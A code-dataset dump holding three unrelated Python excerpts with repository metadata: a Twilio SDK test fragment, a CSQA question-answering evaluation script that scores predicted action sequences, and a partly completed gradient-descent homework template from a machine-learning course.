                    "brand_vettings": "https://messaging.twilio.com/v1/a2p/BrandRegistrations/BN0044409f7e067e279523808d267e2d85/Vettings"
                }
            }
            '''
        ))

        actual = self.client.messaging.v1.brand_registrations.create(customer_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX", a2p_profile_bundle_sid="BUXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX")

        self.assertIsNotNone(actual)
| 40.363128
| 195
| 0.544083
| 538
| 7,225
| 7.081784
| 0.226766
| 0.04042
| 0.057743
| 0.066404
| 0.823622
| 0.800525
| 0.78189
| 0.749344
| 0.746194
| 0.697113
| 0
| 0.135112
| 0.346436
| 7,225
| 178
| 196
| 40.589888
| 0.671749
| 0.015087
| 0
| 0.509434
| 1
| 0
| 0.208466
| 0.118211
| 0
| 0
| 0
| 0
| 0.169811
| 1
| 0.113208
| false
| 0
| 0.075472
| 0
| 0.207547
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
357d9addc20f28cf14355c82eb3d6c16ff9e8138
| 21,453
|
py
|
Python
|
S2SRL/SymbolicExecutor/calculate_sample_test_dataset.py
|
DevinJake/MRL-CQA
|
f4eee239212fb8a2034834fac61675eedf72c98c
|
[
"MIT"
] | 13
|
2020-11-04T02:38:31.000Z
|
2021-09-16T11:25:44.000Z
|
S2SRL/SymbolicExecutor/calculate_sample_test_dataset.py
|
DevinJake/MRL-CQA
|
f4eee239212fb8a2034834fac61675eedf72c98c
|
[
"MIT"
] | null | null | null |
S2SRL/SymbolicExecutor/calculate_sample_test_dataset.py
|
DevinJake/MRL-CQA
|
f4eee239212fb8a2034834fac61675eedf72c98c
|
[
"MIT"
] | 5
|
2021-03-26T09:15:04.000Z
|
2021-07-28T02:33:53.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019/4/8 21:02
# @Author : Yaoleo
# @Blog : yaoleo.github.io
# coding:utf-8
'''Get all questions, annotated actions, entities, relations, types together in JSON format.
'''
import json
from symbolics import Symbolics
from transform_util import transformBooleanToString, list2dict
import logging
def transMask2Action(state, withint):
    """Decode predicted action sequences, execute them symbolically, and
    accumulate precision/recall statistics for one question category.

    :param state: question-category prefix (e.g. "SimpleQuestion(Direct)");
        only test items whose id starts with it are evaluated.
    :param withint: if True, use the INT-annotated annotation/question files.
    :return: list of human-readable summary lines (with trailing newlines)
        to be appended to the report file by the caller.
    """
    if withint:
        json_path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test_INT.json'
        question_path = '../../data/auto_QA_data/mask_test/SAMPLE_FINAL_INT_test.question'
    else:
        json_path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json'
        question_path = '../../data/auto_QA_data/mask_test/SAMPLE_FINAL_test.question'
    with open(json_path, 'r') as load_f, open("../../data/saves/crossent_even_1%_att=0_withINT/sample_final_int_predict.actions", 'r') as predict_actions \
            , open(question_path, 'r') as RL_test:
    # with open("../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json", 'r') as load_f, open("../../data/saves/rl_even_TR_batch8_1%/final_predict.actions", 'r') as predict_actions \
    #         , open("../../data/auto_QA_data/mask_test/FINAL_test.question", 'r') as RL_test:
        linelist = list()
        load_dict = json.load(load_f)
        # Per-category accumulators.
        num = 0
        total_precision = 0
        total_recall = 0
        total_right_count = 0
        total_answer_count = 0
        total_response_count = 0
        bool_right_count = 0
        count_right_count = 0
        # x: "<id>:<action tokens>", y: "<id> <question ...>" (parallel files).
        for x, y in zip(predict_actions, RL_test):
            action = x.strip().split(":")[1]
            id = y.strip().split()[0]
            if (id.startswith(state)):
                num += 1
                # Mask dicts map original symbols -> masked surface tokens.
                entity_mask = load_dict[id]["entity_mask"] if load_dict[id]["entity_mask"] != None else {}
                relation_mask = load_dict[id]["relation_mask"] if load_dict[id]["relation_mask"] != None else {}
                type_mask = load_dict[id]["type_mask"] if load_dict[id]["type_mask"] != None else {}
                # todo: test
                int_mask = load_dict[id]["int_mask"] if 'int_mask' in load_dict[id] else {}
                response_entities = load_dict[id]["response_entities"].strip() if load_dict[id]["response_entities"] != None else ""
                response_entities = response_entities.strip().split("|")
                orig_response = load_dict[id]["orig_response"].strip() if load_dict[id]["orig_response"] != None else ""
                # Update(add) elements in dict: merge all masks into one map.
                entity_mask.update(relation_mask)
                entity_mask.update(type_mask)
                # todo: test
                entity_mask.update(int_mask)
                new_action = list()
                # Default separator of split() method is any whitespace.
                # Replace each masked token with its original symbol.
                for act in action.split():
                    for k, v in entity_mask.items():
                        if act == v:
                            act = k
                            break
                    new_action.append(act)
                print("{0}".format(num))
                '''print("{0}: {1}->{2}".format(num, id, action))'''
                logging.info("%d: %s -> %s", num, id, action)
                #print(" ".join(new_action))
                symbolic_seq = list2dict(new_action)
                # symbolic_seq.append({"A11":["","",""]})### A11
                # Modify with magic.
                # if state.startswith("Verification(Boolean)(All)"):
                #     symbolic_seq[-1] = {"A3":["","",""]} if not symbolic_seq[-1].has_key("A3") else symbolic_seq[-1]### A3
                # if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
                #     symbolic_seq[-1] = {"A11": ["", "", ""]} if not symbolic_seq[-1].has_key("A11") else symbolic_seq[-1]
                # Execute the decoded action sequence symbolically.
                symbolic_exe = Symbolics(symbolic_seq)
                answer = symbolic_exe.executor()
                if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
                    '''print (symbolic_seq)
                    print ("%s::%s" %(answer, orig_response))'''
                    logging.info(symbolic_seq)
                    logging.info("answer:%s, orig_response:%s", answer, orig_response)
                    if orig_response.isdigit() and answer == int(orig_response):
                        count_right_count += 1
                        '''print ("count_right_count+1")'''
                        logging.info("count_right_count+1")
                    else:
                        import re
                        # Fallback: sum all numbers mentioned in the gold
                        # response and compare with the computed count.
                        orig_response = re.findall(r"\d+\.?\d*", orig_response)
                        orig_response = sum([int(i) for i in orig_response])
                        if answer == orig_response:
                            count_right_count += 1
                            '''print ("count_right_count+1")'''
                            logging.info("count_right_count+1")
                # TODO: how to compute accuracy of BOOLEAN? By using response or response_bools?
                # For boolean, the returned answer is a list.
                if state.startswith("Verification(Boolean)(All)"):
                    # To judge the returned answers are in dict format or boolean format.
                    if (type(answer) == dict):
                        temp = []
                        if '|BOOL_RESULT|' in answer:
                            temp.extend(answer['|BOOL_RESULT|'])
                        answer = temp
                        answer_string = transformBooleanToString(answer)
                        if answer_string!='' and answer_string == orig_response:
                            bool_right_count += 1
                            '''print("bool_right_count+1")'''
                            logging.info("bool_right_count+1")
                    else:
                        if answer == True:
                            answer = "YES"
                        if answer == False:
                            answer = "NO"
                        if answer == orig_response:
                            bool_right_count += 1
                            '''print("bool_right_count+1")'''
                            logging.info("bool_right_count+1")
                # To judge the returned answers are in dict format or boolean format.
                # Normalize every answer shape to a flat list for the
                # precision/recall computation below.
                if (type(answer) == dict):
                    temp = []
                    if '|BOOL_RESULT|' in answer:
                        temp.extend(answer['|BOOL_RESULT|'])
                    else:
                        for key, value in answer.items():
                            if (value):
                                temp.extend(list(value))
                    answer = temp
                elif type(answer) == type([]) or type(answer) == type(set([])):
                    answer = sorted((list(answer)))
                elif type(answer) == int:
                    answer = [answer]
                else:
                    answer = [answer]
                # Count gold entities recovered in the computed answer.
                right_count = 0
                for e in response_entities:
                    if (e in answer):
                        right_count += 1
                total_right_count += right_count
                total_answer_count += len(answer)
                total_response_count += len(response_entities)
                precision = right_count / float(len(answer)) if len(answer) != 0 else 0
                total_precision += precision
                recall = (right_count / float(len(response_entities))) if len(response_entities) != 0 else 0
                total_recall += recall
                '''print("orig:", len(response_entities), "answer:", len(answer), "right:", right_count)
                print("Precision:", precision),
                print("Recall:", recall)
                print('===============================')'''
                logging.info("orig:%d, answer:%d, right:%d", len(response_entities), len(answer), right_count)
                logging.info("Precision:%f", precision)
                logging.info("Recall:%f", recall)
                logging.info("============================")
                # print answer
        # Summarize the per-category totals as report lines.
        string_bool_right = "bool_right_count: %d" %bool_right_count
        string_count_right_count = "count_right_count: %d" %count_right_count
        string_total_num = "total_num::total_right::total_answer::total_response -> %d::%d::%d::%d" %(num, total_right_count, total_answer_count, total_response_count)
        print (string_bool_right)
        print (string_count_right_count)
        print (string_total_num)
        logging.info("bool_right_count:%d", bool_right_count)
        logging.info("count_right_count:%d", count_right_count)
        logging.info("total_num::total_right::total_answer::total_response -> %d::%d::%d::%d", num, total_right_count, total_answer_count, total_response_count)
        linelist.append(string_bool_right + '\r\n')
        linelist.append(string_count_right_count + '\r\n')
        linelist.append(string_total_num + '\r\n')
        # Macro-averaged (per question) and micro-averaged (pooled counts)
        # precision/recall.
        mean_pre = total_precision / num if num!=0 else 0.0
        mean_recall = total_recall / num if num!=0 else 0.0
        mean_pre2 = float(total_right_count) / total_answer_count if total_answer_count!=0 else 0.0
        mean_recall2 = float(total_right_count) / total_response_count if total_response_count!=0 else 0.0
        string_mean_pre = "state::mean_pre::mean_recall -> %s::%f::%f" %(state, mean_pre, mean_recall)
        string_mean_pre2 = "state::mean_pre2::mean_recall2 -> %s::%f::%f" %(state, mean_pre2, mean_recall2)
        print(string_mean_pre)
        print(string_mean_pre2)
        print("++++++++++++++")
        logging.info("state::mean_pre::mean_recall -> %s::%f::%f", state, mean_pre, mean_recall)
        logging.info("state::mean_pre2::mean_recall2 -> %s::%f::%f", state, mean_pre2, mean_recall2)
        logging.info("++++++++++++++")
        linelist.append(string_mean_pre + '\r\n')
        linelist.append(string_mean_pre2 + '\r\n')
        linelist.append('++++++++++++++\n\n')
        return linelist
def transMask2ActionMAML(state, withint):
    """Variant of transMask2Action for MAML/Reptile predictions: ids are
    read from the predictions file itself (no separate question file).

    :param state: question-category prefix; only matching ids are evaluated.
    :param withint: if True, use the INT-annotated annotation file.
    :return: list of human-readable summary lines (with trailing newlines).
    """
    if withint:
        path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test_INT.json'
    else:
        path = '../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json'
    with open(path, 'r') as load_f, open("../../data/saves/maml_reptile/final_maml_predict.actions", 'r') as predict_actions:
    # with open("../../data/auto_QA_data/CSQA_ANNOTATIONS_test.json", 'r') as load_f, open("../../data/saves/rl_even_TR_batch8_1%/final_predict.actions", 'r') as predict_actions \
    #         , open("../../data/auto_QA_data/mask_test/FINAL_test.question", 'r') as RL_test:
        linelist = list()
        load_dict = json.load(load_f)
        # Per-category accumulators.
        num = 0
        total_precision = 0
        total_recall = 0
        total_right_count = 0
        total_answer_count = 0
        total_response_count = 0
        bool_right_count = 0
        count_right_count = 0
        # Each prediction line is "<id>:<action tokens>".
        for x in predict_actions:
            action = x.strip().split(":")[1]
            id = x.strip().split(":")[0]
            if (id.startswith(state)):
                num += 1
                # Mask dicts map original symbols -> masked surface tokens.
                entity_mask = load_dict[id]["entity_mask"] if load_dict[id]["entity_mask"] != None else {}
                relation_mask = load_dict[id]["relation_mask"] if load_dict[id]["relation_mask"] != None else {}
                type_mask = load_dict[id]["type_mask"] if load_dict[id]["type_mask"] != None else {}
                # todo: test
                int_mask = load_dict[id]["int_mask"] if 'int_mask' in load_dict[id] else {}
                response_entities = load_dict[id]["response_entities"].strip() if load_dict[id]["response_entities"] != None else ""
                response_entities = response_entities.strip().split("|")
                orig_response = load_dict[id]["orig_response"].strip() if load_dict[id]["orig_response"] != None else ""
                # Update(add) elements in dict: merge all masks into one map.
                entity_mask.update(relation_mask)
                entity_mask.update(type_mask)
                # todo: test
                entity_mask.update(int_mask)
                new_action = list()
                # Default separator of split() method is any whitespace.
                # Replace each masked token with its original symbol.
                for act in action.split():
                    for k, v in entity_mask.items():
                        if act == v:
                            act = k
                            break
                    new_action.append(act)
                print("{0}".format(num))
                '''print("{0}: {1}->{2}".format(num, id, action))'''
                logging.info("%d: %s -> %s", num, id, action)
                #print(" ".join(new_action))
                symbolic_seq = list2dict(new_action)
                # symbolic_seq.append({"A11":["","",""]})### A11
                # Modify with magic.
                # if state.startswith("Verification(Boolean)(All)"):
                #     symbolic_seq[-1] = {"A3":["","",""]} if not symbolic_seq[-1].has_key("A3") else symbolic_seq[-1]### A3
                # if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
                #     symbolic_seq[-1] = {"A11": ["", "", ""]} if not symbolic_seq[-1].has_key("A11") else symbolic_seq[-1]
                # Execute the decoded action sequence symbolically.
                symbolic_exe = Symbolics(symbolic_seq)
                answer = symbolic_exe.executor()
                if state.startswith("QuantitativeReasoning(Count)(All)") or state.startswith("ComparativeReasoning(Count)(All)"):
                    '''print (symbolic_seq)
                    print ("%s::%s" %(answer, orig_response))'''
                    logging.info(symbolic_seq)
                    logging.info("answer:%s, orig_response:%s", answer, orig_response)
                    if orig_response.isdigit() and answer == int(orig_response):
                        count_right_count += 1
                        '''print ("count_right_count+1")'''
                        logging.info("count_right_count+1")
                    else:
                        import re
                        # Fallback: sum all numbers mentioned in the gold
                        # response and compare with the computed count.
                        orig_response = re.findall(r"\d+\.?\d*", orig_response)
                        orig_response = sum([int(i) for i in orig_response])
                        if answer == orig_response:
                            count_right_count += 1
                            '''print ("count_right_count+1")'''
                            logging.info("count_right_count+1")
                # TODO: how to compute accuracy of BOOLEAN? By using response or response_bools?
                # For boolean, the returned answer is a list.
                if state.startswith("Verification(Boolean)(All)"):
                    # To judge the returned answers are in dict format or boolean format.
                    if (type(answer) == dict):
                        temp = []
                        if '|BOOL_RESULT|' in answer:
                            temp.extend(answer['|BOOL_RESULT|'])
                        answer = temp
                        answer_string = transformBooleanToString(answer)
                        if answer_string!='' and answer_string == orig_response:
                            bool_right_count += 1
                            '''print("bool_right_count+1")'''
                            logging.info("bool_right_count+1")
                    else:
                        if answer == True:
                            answer = "YES"
                        if answer == False:
                            answer = "NO"
                        if answer == orig_response:
                            bool_right_count += 1
                            '''print("bool_right_count+1")'''
                            logging.info("bool_right_count+1")
                # To judge the returned answers are in dict format or boolean format.
                # Normalize every answer shape to a flat list for the
                # precision/recall computation below.
                if (type(answer) == dict):
                    temp = []
                    if '|BOOL_RESULT|' in answer:
                        temp.extend(answer['|BOOL_RESULT|'])
                    else:
                        for key, value in answer.items():
                            if (value):
                                temp.extend(list(value))
                    answer = temp
                elif type(answer) == type([]) or type(answer) == type(set([])):
                    answer = sorted((list(answer)))
                elif type(answer) == int:
                    answer = [answer]
                else:
                    answer = [answer]
                # Count gold entities recovered in the computed answer.
                right_count = 0
                for e in response_entities:
                    if (e in answer):
                        right_count += 1
                total_right_count += right_count
                total_answer_count += len(answer)
                total_response_count += len(response_entities)
                precision = right_count / float(len(answer)) if len(answer) != 0 else 0
                total_precision += precision
                recall = (right_count / float(len(response_entities))) if len(response_entities) != 0 else 0
                total_recall += recall
                '''print("orig:", len(response_entities), "answer:", len(answer), "right:", right_count)
                print("Precision:", precision),
                print("Recall:", recall)
                print('===============================')'''
                logging.info("orig:%d, answer:%d, right:%d", len(response_entities), len(answer), right_count)
                logging.info("Precision:%f", precision)
                logging.info("Recall:%f", recall)
                logging.info("============================")
                # print answer
        # Summarize the per-category totals as report lines.
        string_bool_right = "bool_right_count: %d" %bool_right_count
        string_count_right_count = "count_right_count: %d" %count_right_count
        string_total_num = "total_num::total_right::total_answer::total_response -> %d::%d::%d::%d" %(num, total_right_count, total_answer_count, total_response_count)
        print (string_bool_right)
        print (string_count_right_count)
        print (string_total_num)
        logging.info("bool_right_count:%d", bool_right_count)
        logging.info("count_right_count:%d", count_right_count)
        logging.info("total_num::total_right::total_answer::total_response -> %d::%d::%d::%d", num, total_right_count, total_answer_count, total_response_count)
        linelist.append(string_bool_right + '\r\n')
        linelist.append(string_count_right_count + '\r\n')
        linelist.append(string_total_num + '\r\n')
        # Macro-averaged (per question) and micro-averaged (pooled counts)
        # precision/recall.
        mean_pre = total_precision / num if num!=0 else 0.0
        mean_recall = total_recall / num if num!=0 else 0.0
        mean_pre2 = float(total_right_count) / total_answer_count if total_answer_count!=0 else 0.0
        mean_recall2 = float(total_right_count) / total_response_count if total_response_count!=0 else 0.0
        string_mean_pre = "state::mean_pre::mean_recall -> %s::%f::%f" %(state, mean_pre, mean_recall)
        string_mean_pre2 = "state::mean_pre2::mean_recall2 -> %s::%f::%f" %(state, mean_pre2, mean_recall2)
        print(string_mean_pre)
        print(string_mean_pre2)
        print("++++++++++++++")
        logging.info("state::mean_pre::mean_recall -> %s::%f::%f", state, mean_pre, mean_recall)
        logging.info("state::mean_pre2::mean_recall2 -> %s::%f::%f", state, mean_pre2, mean_recall2)
        logging.info("++++++++++++++")
        linelist.append(string_mean_pre + '\r\n')
        linelist.append(string_mean_pre2 + '\r\n')
        linelist.append('++++++++++++++\n\n')
        return linelist
def calculate_RL_or_DL_result(file_path, withint):
    """Evaluate RL/DL predictions over every question category and write
    the aggregated report to ../../data/auto_QA_data/test_result/<file_path>.txt.

    :param file_path: output file name without extension.
    :param withint: forwarded to transMask2Action; selects the
        INT-annotated dataset when True.
    """
    path = '../../data/auto_QA_data/test_result/' + file_path + '.txt'
    state_list = ["SimpleQuestion(Direct)", "Verification(Boolean)(All)", "QuantitativeReasoning(Count)(All)",
                  "QuantitativeReasoning(All)", "ComparativeReasoning(Count)(All)", "ComparativeReasoning(All)",
                  "LogicalReasoning(All)"]
    # state_list = ["Verification(Boolean)(All)"]
    # `with` guarantees the handle is closed even if evaluation or
    # writelines raises (the original leaked it on error).
    with open(path, 'w', encoding="UTF-8") as fw:
        linelist = []
        for state in state_list:
            linelist += transMask2Action(state, withint)
        fw.writelines(linelist)
def calculate_MAML_result(file_path, withint):
    """Evaluate MAML/Reptile predictions over every question category and
    write the aggregated report to
    ../../data/auto_QA_data/test_result/<file_path>.txt.

    :param file_path: output file name without extension.
    :param withint: forwarded to transMask2ActionMAML; selects the
        INT-annotated dataset when True.
    """
    path = '../../data/auto_QA_data/test_result/' + file_path + '.txt'
    state_list = ["SimpleQuestion(Direct)", "Verification(Boolean)(All)", "QuantitativeReasoning(Count)(All)",
                  "QuantitativeReasoning(All)", "ComparativeReasoning(Count)(All)", "ComparativeReasoning(All)",
                  "LogicalReasoning(All)"]
    # state_list = ["Verification(Boolean)(All)"]
    # `with` guarantees the handle is closed even if evaluation or
    # writelines raises (the original leaked it on error).
    with open(path, 'w', encoding="UTF-8") as fw:
        linelist = []
        for state in state_list:
            linelist += transMask2ActionMAML(state, withint)
        fw.writelines(linelist)
if __name__ == "__main__":
    # calculate_RL_or_DL_result('crossent_even_1%_att=0_withINT', withint=True)
    # Evaluate the MAML/Reptile predictions on the non-INT test set.
    calculate_MAML_result('maml_reptile_full_test', withint=False)
| 55.291237
| 183
| 0.540577
| 2,395
| 21,453
| 4.581211
| 0.079749
| 0.069267
| 0.041013
| 0.017864
| 0.945771
| 0.94249
| 0.931006
| 0.920707
| 0.91615
| 0.908312
| 0
| 0.012731
| 0.322659
| 21,453
| 387
| 184
| 55.434109
| 0.742344
| 0.129819
| 0
| 0.915254
| 0
| 0
| 0.163272
| 0.091592
| 0
| 0
| 0
| 0.010336
| 0
| 1
| 0.013559
| false
| 0
| 0.020339
| 0
| 0.040678
| 0.047458
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
35c24cee240e1717af999daba2e9177027a9d3e0
| 13,520
|
py
|
Python
|
2021-fall-part-1/hws/HW4_gradient_descent_pr/utils.py
|
bagrorg/ml-course
|
9a2aa7379ea0dee6968eef3a4ae5926e83c391ca
|
[
"MIT"
] | 4
|
2021-02-01T19:57:40.000Z
|
2021-08-02T14:45:34.000Z
|
2021-fall-part-1/hws/HW4_gradient_descent_pr/utils.py
|
bagrorg/ml-course
|
9a2aa7379ea0dee6968eef3a4ae5926e83c391ca
|
[
"MIT"
] | null | null | null |
2021-fall-part-1/hws/HW4_gradient_descent_pr/utils.py
|
bagrorg/ml-course
|
9a2aa7379ea0dee6968eef3a4ae5926e83c391ca
|
[
"MIT"
] | 13
|
2021-09-02T07:29:24.000Z
|
2021-12-13T15:26:00.000Z
|
from __future__ import annotations
import numpy as np
# Default hyper-parameters shared by the descent classes below.
s0_default: float = 1            # learning-rate schedule offset (s0 in lambda_*(s0/(s0+k))**p)
p_default: float = 0.5           # learning-rate schedule decay exponent
batch_size_default: int = 1      # mini-batch size for StochasticDescent
alpha_default: float = 0.1       # momentum coefficient for MomentumDescent
eps_default: float = 1e-8        # Adagrad smoothing term
mu_default: float = 1e-2         # l2 regularization coefficient (*Reg classes)
tolerance_default: float = 1e-3  # presumably a stopping tolerance for the training loop — not used in this file
max_iter_default: int = 1000     # presumably an iteration cap for the training loop — not used in this file
class BaseDescent:
    """Common interface for the gradient-descent variants in this module.

    Subclasses provide update_weights() and calc_gradient(); step()
    chains the two together.
    """

    def __init__(self):
        # Weight vector; concrete subclasses overwrite this with a copy
        # of their initialization.
        self.w = None

    def step(self, X: np.ndarray, y: np.ndarray, iteration: int) -> np.ndarray:
        """Perform one descent step.

        :param X: objects' features
        :param y: objects' targets
        :param iteration: iteration number
        :return: difference between weights
        """
        gradient = self.calc_gradient(X, y)
        return self.update_weights(gradient, iteration)

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Template for the weight-update rule; no-op in the base class.

        :param gradient: gradient
        :param iteration: iteration number
        :return: weight difference: np.ndarray
        """
        pass

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Template for the gradient computation; no-op in the base class.

        :param X: objects' features
        :param y: objects' targets
        :return: gradient: np.ndarray
        """
        pass
class GradientDescent(BaseDescent):
    """Full-batch gradient descent (gradient math left as an exercise)."""

    def __init__(self, w0: np.ndarray, lambda_: float, s0: float = s0_default, p: float = p_default):
        """
        :param w0: weight initialization
        :param lambda_: learning rate parameter (float)
        :param s0: learning rate parameter (float)
        :param p: learning rate parameter (float)
        """
        super().__init__()

        def learning_rate(k):
            # Decaying schedule: lambda_ * (s0 / (s0 + k)) ** p.
            return lambda_ * (s0 / (s0 + k)) ** p

        self.eta = learning_rate
        self.w = np.copy(w0)

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Apply one weight update and return the weight difference.

        Not implemented in this template.
        """
        # TODO: implement updating weights function
        raise NotImplementedError('GradientDescent update_weights function not implemented')

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Compute the gradient at the current weights w.

        Not implemented in this template.
        """
        # TODO: implement calculating gradient function
        raise NotImplementedError('GradientDescent calc_gradient function not implemented')
class StochasticDescent(BaseDescent):
    """Stochastic (mini-batch) gradient descent template."""

    def __init__(self, w0: np.ndarray, lambda_: float, s0: float = s0_default, p: float = p_default,
                 batch_size: int = batch_size_default):
        """
        :param w0: weight initialization
        :param lambda_: learning rate parameter (float)
        :param s0: learning rate parameter (float)
        :param p: learning rate parameter (float)
        :param batch_size: batch size (int)
        """
        super().__init__()

        def learning_rate(k):
            # Decaying schedule: lambda_ * (s0 / (s0 + k)) ** p.
            return lambda_ * (s0 / (s0 + k)) ** p

        self.eta = learning_rate
        self.batch_size = batch_size
        self.w = np.copy(w0)

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Apply one weight update from a gradient estimate and return
        the weight difference. Not implemented in this template.
        """
        # TODO: implement updating weights function
        raise NotImplementedError('StochasticDescent update_weights function not implemented')

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Compute a gradient estimate at the current weights w.

        Not implemented in this template.
        """
        # TODO: implement calculating gradient function
        raise NotImplementedError('StochasticDescent calc_gradient function not implemented')
class MomentumDescent(BaseDescent):
    """Gradient descent with momentum template."""

    def __init__(self, w0: np.ndarray, lambda_: float, alpha: float = alpha_default, s0: float = s0_default,
                 p: float = p_default):
        """
        :param w0: weight initialization
        :param lambda_: learning rate parameter (float)
        :param alpha: momentum coefficient
        :param s0: learning rate parameter (float)
        :param p: learning rate parameter (float)
        """
        super().__init__()

        def learning_rate(k):
            # Decaying schedule: lambda_ * (s0 / (s0 + k)) ** p.
            return lambda_ * (s0 / (s0 + k)) ** p

        self.eta = learning_rate
        self.alpha = alpha
        self.w = np.copy(w0)
        # Momentum accumulator, starts at zero.
        self.h = 0

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Apply one momentum update from a gradient estimate and return
        the weight difference. Not implemented in this template.
        """
        # TODO: implement updating weights function
        raise NotImplementedError('MomentumDescent update_weights function not implemented')

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Compute the gradient at the current weights w.

        Not implemented in this template.
        """
        # TODO: implement calculating gradient function
        raise NotImplementedError('MomentumDescent calc_gradient function not implemented')
class Adagrad(BaseDescent):
    """
    Adaptive gradient algorithm class.

    Accumulates squared gradients per coordinate in ``g`` and divides each
    step by sqrt(eps + g), so frequently-updated coordinates get smaller
    effective learning rates.
    """

    def __init__(self, w0: np.ndarray, lambda_: float, eps: float = eps_default, s0: float = s0_default,
                 p: float = p_default):
        """
        :param w0: weight initialization
        :param lambda_: learning rate parameter (float)
        :param eps: smoothing term (float)
        :param s0: learning rate parameter (float)
        :param p: learning rate parameter (float)
        """
        super().__init__()
        # Decaying step-size schedule: eta_k = lambda_ * (s0 / (s0 + k)) ** p.
        self.eta = lambda k: lambda_ * (s0 / (s0 + k)) ** p
        self.eps = eps
        self.w = np.copy(w0)
        # Per-coordinate sum of squared gradients; 0 broadcasts on first use.
        self.g = 0

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """
        Changing weights with respect to gradient:
            g_{k+1} = g_k + gradient ** 2
            w_{k+1} = w_k - eta(k) * gradient / sqrt(eps + g_{k+1})

        :param iteration: iteration number
        :param gradient: gradient estimate
        :return: weight difference w_{k+1} - w_k: np.ndarray
        """
        self.g = self.g + gradient ** 2
        weight_diff = -self.eta(iteration) * gradient / np.sqrt(self.eps + self.g)
        self.w = self.w + weight_diff
        return weight_diff

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """
        Getting objects, calculating gradient at point w.

        Full-batch MSE gradient: 2/l * X^T (Xw - y), l = number of objects
        (assumes MSE loss — TODO confirm loss convention).

        :param X: objects' features
        :param y: objects' targets
        :return: gradient: np.ndarray
        """
        return 2.0 / X.shape[0] * X.T @ (X @ self.w - y)
class GradientDescentReg(GradientDescent):
    """
    Full gradient descent with regularization class
    """

    def __init__(self, w0: np.ndarray, lambda_: float, mu: float = mu_default, s0: float = s0_default,
                 p: float = p_default):
        """
        :param mu: l2 coefficient
        """
        super().__init__(w0=w0, lambda_=lambda_, s0=s0, p=p)
        self.mu = mu

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Delegate the step to the unregularized parent update rule."""
        return super().update_weights(gradient, iteration)

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Parent gradient plus the gradient of the l2 penalty.

        d/dw (mu/2 * ||w||^2) = mu * w, so l2 = w here and it is scaled by
        self.mu below.  NOTE(review): if the penalty is defined as
        mu * ||w||^2, the term should be 2 * w — confirm against the spec.
        """
        l2 = self.w
        return super().calc_gradient(X, y) + l2 * self.mu
class StochasticDescentReg(StochasticDescent):
    """
    Stochastic gradient descent with regularization class
    """

    def __init__(self, w0: np.ndarray, lambda_: float, mu: float = mu_default, s0: float = s0_default,
                 p: float = p_default, batch_size: int = batch_size_default):
        """
        :param mu: l2 coefficient
        """
        super().__init__(w0=w0, lambda_=lambda_, s0=s0, p=p, batch_size=batch_size)
        self.mu = mu

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Delegate the step to the unregularized parent update rule."""
        return super().update_weights(gradient, iteration)

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Parent mini-batch gradient plus the gradient of the l2 penalty.

        d/dw (mu/2 * ||w||^2) = mu * w, so l2 = w here and it is scaled by
        self.mu below.  NOTE(review): if the penalty is defined as
        mu * ||w||^2, the term should be 2 * w — confirm against the spec.
        """
        l2 = self.w
        return super().calc_gradient(X, y) + l2 * self.mu
class MomentumDescentReg(MomentumDescent):
    """
    Momentum gradient descent with regularization class
    """

    def __init__(self, w0: np.ndarray, lambda_: float, alpha: float = alpha_default, mu: float = mu_default,
                 s0: float = s0_default, p: float = p_default):
        """
        :param mu: l2 coefficient
        """
        super().__init__(w0=w0, lambda_=lambda_, alpha=alpha, s0=s0, p=p)
        self.mu = mu

    def update_weights(self, gradient: np.ndarray, iteration: int) -> np.ndarray:
        """Delegate the step to the unregularized parent update rule."""
        return super().update_weights(gradient, iteration)

    def calc_gradient(self, X: np.ndarray, y: np.ndarray) -> np.ndarray:
        """Parent gradient plus the gradient of the l2 penalty.

        d/dw (mu/2 * ||w||^2) = mu * w, so l2 = w here and it is scaled by
        self.mu below.  NOTE(review): if the penalty is defined as
        mu * ||w||^2, the term should be 2 * w — confirm against the spec.
        """
        l2 = self.w
        return super().calc_gradient(X, y) + l2 * self.mu
class AdagradReg(Adagrad):
    """
    Adaptive gradient algorithm with regularization class
    """

    def __init__(self, w0: np.ndarray, lambda_: float, eps: float = eps_default, mu: float = mu_default,
                 s0: float = s0_default, p: float = p_default):
        """
